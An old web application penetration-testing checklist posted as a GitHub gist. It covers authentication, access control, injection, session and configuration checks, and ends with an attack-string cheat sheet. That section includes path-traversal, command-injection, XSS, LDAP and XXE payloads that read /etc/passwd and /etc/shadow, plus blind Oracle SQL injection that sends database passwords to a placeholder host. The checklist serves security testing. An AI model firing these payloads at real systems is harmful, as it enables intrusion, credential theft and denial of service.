Skip to content

Instantly share code, notes, and snippets.

@wirepair

wirepair/attackvectorchecklist.txt

Created March 20, 2019 22:54
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save wirepair/77501f1000ea1b5c704fdb7eabf3d825 to your computer and use it in GitHub Desktop.
Save wirepair/77501f1000ea1b5c704fdb7eabf3d825 to your computer and use it in GitHub Desktop.
Download ZIP
super old pen-testing checklist
Raw
attackvectorchecklist.txt
Attack Vector Checklist v1.2 Mar 23rd 2010
-----------------------------------
target site: [ ]
user accounts: [ ]
/*****************************************************************************/
/* AUTHENTICATION */
/*****************************************************************************/
1. Bypass transaction authentication by spoofing
------
[ ] Attempt modification of user supplied parameters in accessing stored data
[ ] Attempt modifications of server side parameters that are used in
authentication checks.
2. Bypass transaction authentication by using alternate credentials/logic flows
------
[ ] Attempted unauthorized access by changing the order of specific expected
application calls.
3. Bypass application authentication by alternate credentials
------
[ ] Submission of modified credentials to bypass or manipulate LDAP query.
[ ] Submission of requests with modified sessions.
[ ] Submission of requests with modified session variables.
4. Bypass application authentication by directed browsing
------
[ ] Submission of URL resources observed with different roles.
[ ] Submission of URL resources as authenticated user
[ ] Submission of URL resources as an anonymous user.
5. Bypass authentication checks in web service calls
------
[ ] Submission of web service requests without credentials.
[ ] Submission of alternate credentials with web service requests.
6. Incremental or predictable user names.
------
[ ] Identify if usernames incremental or otherwise predictable.
7. Bypass or manipulate application password reset functionality logic
------
[ ] If password reset takes an email address, attempt to inject a different
e-mail address
Ex: real@account,another@account
Ex: another@account.com@real@account.com
Ex: real@account.com%0d%0aRCPT%20TO:another@account.com
8. Security question strength
------
[ ] Determine if the same security question is asked every time
until a successful attempt is made, or a random question is selected
every time
9. Account Lockout Functionality
------
[ ] Determine that multiple invalid login attempts cause the account to be
locked for a specified amount of time. (3 to 5 times)
Note: This should be tested at the END of the testing time frame in
the event that a manual process is required for account unlocking.
TECHNOLOGY SPECIFIC:
======
J2EE:
[ ] Attempt to bypass VBAAC using HEAD requests to protected resources
Ex: HEAD /admin/adminpage.jsp?adduser=isaac HTTP/1.0
Reference:
www.aspectsecurity.com/documents/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf
/*****************************************************************************/
/* ACCESS CONTROL */
/*****************************************************************************/
1. Parameter manipulation in the application
------
[ ] Modification of parameters to known good values for another role.
[ ] Add user identifier parameters to pages which do not have them.
Ex: /userfiles.jsp?fileid=1
/userfiles.jsp?fileid=1&userid=1
[ ] Modification of parameters to include LDAP specific characters.
[ ] Modification of parameters to include SQL specific characters.
[ ] Modification of XML requests.
[ ] Modification of web service requests.
2. Context switching
------
[ ] Check for re-use of session IDs when logging out/into application.
[ ] Test privileges of user roles between communities.
[ ] Proxy User ability can not be used to proxy to unauthorized accounts.
3. Inherited privilege roles
------
[ ] Test creation of new roles.
[ ] Test unauthorized access to roles during creation process.
[ ] Test for controls when granting specific data access to users.
4. Insufficient privilege dropping
------
[ ] Test logout process for a session.
5. Cross Site Request Forgery
------
[ ] Verify the application requires a non-deterministic value when making to
the system. This value can not be a cookie and should be sent as a
parameter.
/*****************************************************************************/
/* CONFIGURATION/ENVIRONMENT */
/*****************************************************************************/
1. Unencrypted communication channels
------
[ ] Attempt to force the application to communicate over unencrypted channels.
2. Weak password requirements
------
[ ] Attempt to set insecure passwords.
[ ] Change password form requires previous password.
3. Administrative interface access
------
[ ] Attempt unauthorized/unauthenticated connections to administrative
interfaces.
4. Test/QA functionality
------
[ ] Review application for QA programs.
[ ] Test external services for test/QA functionality.
[ ] Test for existence of robots.txt
5. Debug information
------
[ ] Review web pages for debug information present in source.
[ ] Search test system for accessible debug information.
6. Weak CAPTCHA implementation
------
[ ] Review captcha implementation to determine if value is predictable
[ ] Re-use previously successful captcha value on a subsequent request.
[ ] Sample and analyze CAPTCHA values to determine structure and search space.
Note: Open source tools exist for testing CAPTCHA systems:
- PWNtcha, The Captcha Breaker, Captcha decoder, Online Captcha Decoder
7. Dangerous HTTP Verbs
------
[ ] Determine if dangerous HTTP verbs such as CONNECT, TRACE, PUT are allowed.
[ ] Attempt dangerous HTTP verbs using HTTP/1.0, and without a Host: header.
8. Default Error Pages
------
[ ] Determine if the default 4xx and 5xx error pages are viewable and leak
information about the running environment.
/*****************************************************************************/
/* CRYPTOGRAPHY */
/*****************************************************************************/
1. Insufficient algorithmic entropy
------
[ ] Review configuration and ciphers available and used by the system.
[ ] Search for any non-standard or insecure ciphers used by the system.
2. Hard coded keys
------
[ ] Search code for accessible encryption keys.
3. Small key space
------
[ ] Review the size of keys used by the system.
4. Reflective attacks
------
[ ] Search applications for the exposure of cryptographic material.
[ ] Look for opportunities to have the system generate cryptographic
text controlled by the attacker.
5. Insecure encryption modes
------
[ ] If it is possible to determine the cipher in use, verify insecure modes
such as ECB mode are not in use.
/*****************************************************************************/
/* DATA EXPOSURE */
/*****************************************************************************/
1. Passwords exposed
------
[ ] Search for passwords in system scripts.
[ ] Search for passwords returned to the user in the application.
2. Accessible source code
------
[ ] Search for accessible source code on the system
[ ] Submission of special characters through the web interface to confuse the
web and application server into returning unprocessed source code.
[ ] Attempt direct access to config files and binaries through the external
interfaces.
3. Verbose comments
------
[ ] Review application pages for descriptive developer comments.
4. Dead code present on system
------
[ ] Search operating system for accessible dead or backup code
[ ] Review application pages for references/presence of dead code.
5. Sensitive information stored unencrypted
------
[ ] Search application for sensitive information in accessible in
temporary files, log files or in configuration files.
6. Verbose error messages
------
[ ] Submission of unexpected user input to generate error conditions and
messages from the server;
[ ] Submission of incorrect login information to generate login errors;
[ ] Submission of file extensions to trigger application server specific
error messages;
[ ] Submission of LDAP specific characters to generate LDAP error messages.
/*****************************************************************************/
/* DATA VALIDATION */
/*****************************************************************************/
1. Path traversal in file upload functionality
------
[ ] Attempt to reference specific files in header files and in
source/destination;
[ ] Attempt to append additional files for transfer;
[ ] Attempt to modify the file request to avoid any possible filtering;
[ ] Modify requests with relative paths.
2. Path traveresal in application
------
[ ] Attempt relative paths in file requests
[ ] Attempt alternate encodings of file requests.
Ex: Generic Traversal Attacks:
/../../
/./../././.././
/....//....//
\..\..\
\.\..\.\.\..\.\
\....\\....\\
Ex: Double Encoded
/%252e%252e/%252e%252e/
/%252e./%252e./
/.%252e/.%252e/
/%252e./.%252e/
/.%252e/%252e./
/%%32e%%32e/%%32e%%32e/
/%25%32e%25%32e/%25%32e%25%32e/
/..%252f../
/..%255c../
/..%%35c../
/..%%32f../
/..%25%35%63../
/..%25%32%66../
Ex: Overlong Invalid UTF-8 Sequences:
/..%c0%af../
/..%c0%2f../
/..%c1%9c../
/..%c1%1c../
/%c0%ae%c0%ae/%c0%ae%c0%ae/
/%c0%2e%c0%2e/%c0%2e%c0%2e/
/..%e0%80%af../
/..%f0%80%80%af../
/..%f8%80%80%80%af../
/..%fc%80%80%80%80%af../
3. Command injection in application
------
[ ] Attempt to bypass filters submitting commands as part of shell calls
made by the application
Ex: ` | && ;
[ ] Attempt to change application commands in requests.
Ex: file.pl?doc=/bin/ls|
Ex: file.pl?dir=;cat /etc/passwd
4. XSS in web interfaces
------
[] Submit active script into user supplied input;
Ex: <script>alert(123)</script>
Ex: <%00script>alert(123)</script>
Ex: <img src="javascript:alert(123)">
Ex: ';alert(123);
Ex: \';alert(123);
[ ] Attempt to bypass filters with different character encodings;
[ ] Search for scripting making direct use of user input.
Note: This may include areas of the DOM such as document.location.href,
window.location,document.URL etc, which can be abused by injecting script
directly into the URI query or URI fragment.
Ex: blah.jsp#<script>alert(document.cookie)</script>
5. SQL Injection
------
[ ] Include SQL relevant characters in user input
Ex: ' , " ) % %25 ' OR 1=1--
[ ] Submit valid SQL in header fields to inject into possible logging
processes.
[ ] Submit valid SQL statements in an attempt to have the system call back
in the event the injection vector does not return results. (Blind)
Ex (Oracle): '+||+UTL_HTTP.REQUEST('http://<yourip>/SqlTest')||'--
6. LDAP injection in auth process
------
[ ] Include LDAP relevant characters in username, password and region fields
for login requests;
Ex: ' ) * | $ &
[ ] Attempt to modify LDAP queries used in authentication to match wildcards.
Ex: uname=userA)(uid=*)
Ex: uname=userA)(&))
Reference:
http://www.blackhat.com/presentations/bh-europe-08/
Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf
7. CRLF injection in web interfaces
------
[ ] Attempt to input CRLF content with user input
[ ] Attempt injection in application redirection flows
8. Parameter manipulation in web interfaces
------
[ ] Modify user input to modify web requests
[ ] Modify user input to modify Location/redirection. (URL Injection)
[ ] Test edge cases for input types
9. Code injection in any service
------
[ ] Identify possible injection points in web service, file service,
and backend system calls through fuzzing process.
Ex: file.php?func=echo+hi;
Ex: file.php?func=;system("/bin/ls");
10. CSRF in web interfaces
------
[ ] Review web interface request structure to determine if
non-deterministic values/tokens are used in requests.
11. XML Injection
------
[ ] Include relevant XML characters in requests to the system also attempt
to inject unbalanced XML tags.
Ex: <!-- < ' > ]]> <![CDATA[
Ex (XSS):
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
[ ] If parsing of user supplied XML data attempt to inject various invalid
XML formats.
Ex (Local file reading):
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
Reference:
http://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
TECHNOLOGY SPECIFIC
======
1. Web Services Testing
------
[ ] Identify any WSDL or other web service definition files.
Ex:
http://<webservice-host>:<port>/<servicename>
http://<webservice-host>:<port>/<servicename>.wsdl
http://<webservice-host>:<port>/<servicename>?wsdl
http://<webservice-host>:<port>/<servicename>.aspx?wsdl
http://<webservice-host>:<port>/<servicename.dll>?wsdl
http://<webservice-host>:<port>/<servicename.exe>?wsdl
http://<webservice-host>:<port>/<servicename.php>?wsdl
http://<webservice-host>:<port>/<servicename.pl>?wsdl
http://<webservice-host>:<port>/<servicename.dll>?disco
http://<webservice-host>:<port>/<servicename.exe>?disco
http://<webservice-host>:<port>/<servicename.php>?disco
http://<webservice-host>:<port>/<servicename.pl>?disco
http://<webservice-host>:<port>/axis/services/<servicename>?wsdl
http://<webservice-host>:<port>/axis/services/<service-name>
http://<webservice-host>:<port>/<servlets>/<servicename>?wsdl
http://<webservice-host>:<port>/<servlets>/<service-name>
2. Cross-Site Flashing
------
[ ] By using FLARE decompile flash movies and determine if the following
methods exist as they are known to be vulnerable to XSF attacks.
loadVariables()
loadMovie()
getURL()
loadMovie()
loadMovieNum()
FScrollPane.loadScrollContent()
LoadVars.load
LoadVars.send
XML.load ( 'url' )
LoadVars.load ( 'url' )
Sound.loadSound( 'url' , isStreaming );
NetStream.play( 'url' );
flash.external.ExternalInterface.call(_root.callback)
htmlText
asfunction
*The below example assumes the URL variable is defined.
Ex: http://victim/file.swf?URL=asfunction:getURL,javascript:alert(123);
Reference:
http://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OWASP-DV-004)
/*****************************************************************************/
/* DATA HANDLING */
/*****************************************************************************/
1. Buffer overflows in accessible services
------
[ ] Generate varied length strings submitted through different input to
generate errors/failures in services.
2. Heap overflows in accessible services
------
[ ] Submit varied length strings for user supplied data to surface any
error/failure in services.
3. Format string attacks in accessible services
------
[ ] Submit format strings to services to generate error conditions.
Ex: %x %25x %p %04d
4. Alternate character encodings
------
[ ] Submit data with different character encodings to bypass filtering.
5. Data truncation
------
[ ] Submit varied length strings to filtered content to check for proper
validation and truncation processes.
6. Integer overflows/underflows
------
[ ] Submit edge cases for integer values to surface any potential integer
overflow/underflow conditions in the application logic.
Ex: 128, 129, 256, 257, 32768, 32769, 65536, 65537, 2147483648, 2147483649
4294967296, 4294967297
Reference:
signed char -128 127
unsigned char 0 255
short -32768 32767
unsigned short 0 65535
int -2147483648 2147483647
unsigned int 0 4294967295
long -2147483648 2147483647
unsinged long 0 4294967295
long long -9223372036854775808 9223372036854775807
unsigned long 0 18446774073709551615
/*****************************************************************************/
/* ERROR REPORTING */
/*****************************************************************************/
1. DB errors exposed
------
[ ] Modify user supplied input to include erroneous DB input
2. Stack traces returned to the user
------
[ ] Modify user input and look for stack traces in error messages, header
parameters or in page source returned to the user.
3. System errors exposed to the user
------
[ ] Review error messages returned to the user for the presence of system error
messages.
4. Authentication error messages
------
[ ] Review failed login attempts for descriptive error messages.
/*****************************************************************************/
/* SESSION MANAGEMENT */
/*****************************************************************************/
1. Session fixation attacks
------
[ ] Attempt to preset session in login call;
[ ] Attempt to preset session in cookie;
[ ] Attempt to pre set session in parameters.
2. Insecure cookie creation
------
[ ] Review all cookie creation calls from the server.
3. Insecure cookie usage
------
[ ] Validate cookie information is not used in displaying content back to the
user.
- Add cookie to uri (url rewriting format):
/file.jsp;errcookie=<script>alert(123)</script>
4. Session IDs predictable
------
[ ] Sample and analyze sessionID for randomness in session ID creation process.
*Burp Sequencer has a decent tool built in for session id analysis
5. Session IDs searchable
------
[ ] Sample and analyze sessionIDs to determine structure and search space.
6. Long lived session IDs
------
[ ] Attempt to reuse sessions at 30 min, 1 hour, 24 hour intervals.
7. Insecure logout functionality
------
[ ] Determine if session is deleted serverside as well as client side.
(Intercept logout page and remove the Set-Cookie header which is attempting
to nullify the value)
+-----------------------------------------------------------------------------+
| VARIOUS ATTACK STRINGS |
+-----------------------------------------------------------------------------+
==========================SQL Injection (Oracle)===============================
Get table info:
SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'
Get column info of a specific table:
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME'
Get database name:
SELECT name FROM v$database
Get the name of the database we are currently in:
SELECT global_name FROM global_name
Get the database usernames and passwords:
SELECT username,password FROM dba_users;
Get the database server version information:
SELECT banner||'-'||(SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')
FROM v$version WHERE banner LIKE 'TNS%'
Similiar to above:
SELECT product FROM product_component_version
SELECT version FROM product_component_version
Get the current database user:
SELECT user FROM dual
Same as above:
SELECT username FROM v$session WHERE audsid=sys_context('userenv','SESSIONID')
AND rownum=1
Search for a specific table name using LIKE keyword:
(Search for a table that contains ...AUTH...)
SELECT table_name FROM dba_tab_columns WHERE table_name LIKE '%25AUTH%25'
For Blind Oracle SQL Injection:
When using UTL_HTTP.REQUEST you must have an HTTP server running on
your machine to log the results.
Get user:
'+||+UTL_HTTP.REQUEST('http://ip.ip.ip.ip/sql.php?SQL='||(select
concat(username,password) from dba_users))||'--
Same as above but using || to concatenate instead of concat():
'+||+UTL_HTTP.REQUEST('http://ip.ip.ip.ip/sql.php?SQL='||(select
ID||':'||PWD from TABLE where rownum=1))||'--
==============================XML Injection=====================================
count(/child::node())
x' or name()='username' or 'x'='y
<name>','')); phpinfo(); exit;/*</name>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<?xml version="1.0" encoding="ISO-8859-1"?>
<foo>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<foo>
<![CDATA[' or 1=1 or ''=']]>
</foo>
External Entity Inclusion 1:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file://c:/boot.ini">]>
<foo>&xxe;</foo>
External Entity Inclusion 2:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:////etc/passwd">]>
<foo>&xxe;</foo>
External Entity Inclusion 3:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:////etc/shadow">]>
<foo>&xxe;</foo>
External Entity Inclusion 4: BECAREFUL THIS WILL DOS THE SYSTEM!!!!!!!!!!!
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:////dev/random">]>
<foo>&xxe;</foo>
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
<xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
TODO: Add More...
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment